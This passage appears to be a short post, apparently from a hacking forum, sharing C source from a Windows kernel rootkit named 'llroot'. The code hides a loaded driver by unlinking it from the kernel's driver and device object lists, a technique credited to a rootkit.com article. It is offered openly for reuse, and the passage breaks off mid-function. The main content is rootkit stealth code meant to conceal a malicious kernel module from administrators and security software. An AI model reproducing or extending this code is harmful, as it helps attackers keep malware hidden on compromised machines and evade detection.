Hiding kernel modules

An article posted by a Russian hacker on rootkit.com mentioned these two methods. After discussing them with him I implemented them in llroot; the code is posted here for what it's worth:

```c
/******************************************************************************
 **
 ** The following routines implement hide driver by removing module from
 ** driver objects and device objects
 **
 ******************************************************************************/
void RemoveModuleFromDriverObjects(void)
{
    POBJECT_TYPE    DriverType = *IoDriverObjectType;
    PLIST_ENTRY     e_prev, e_next, entry0, entry1;
    PDRIVER_OBJECT  obj;
    PUNICODE_STRING punistrDriverName;
    PANSI_STRING    pstrDriverName;
    NTSTATUS        ntStatus;
    ULONG           d_size;

    entry0 = DriverType->ObjectListHead.Flink;
    entry1 = entry0;

    punistrDriverName = (PUNICODE_STRING)ExAllocatePool(PagedPool,
                            sizeof(UNICODE_STRING) + (sizeof(WCHAR) * 1024));
    if (punistrDriverName == NULL)
    {
        DbgPrint("llroot-->punistrDriverName
```